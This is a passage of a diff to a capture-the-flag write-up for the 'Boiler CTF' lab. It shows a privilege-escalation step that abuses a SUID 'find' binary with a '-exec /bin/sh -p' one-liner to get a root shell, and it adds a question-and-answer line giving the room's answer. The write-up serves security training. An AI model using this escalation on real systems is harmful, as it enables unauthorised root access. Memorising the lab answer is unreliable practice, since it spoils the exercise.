Cyberretta/Write-Ups-THM/Boiler_CTF.md

 ## Privilege escalation

 Binary `find` has the SUID and it should have it.
-We can use this to get a shell as root since this binary is owned by root :
+We can use this to get a shell as root since this binary is owned by root (https://gtfobins.github.io/gtfobins/find/) :
 ```
 stoner@Vulnerable:/var/backups$ find . -exec /bin/sh -p \; -quit
 # whoami
 root
-#
 ```

+**Question : What did you exploit to get the privileged user ?**
+**Answer : find**

 We are root !
 Let's get the root flag :
 ```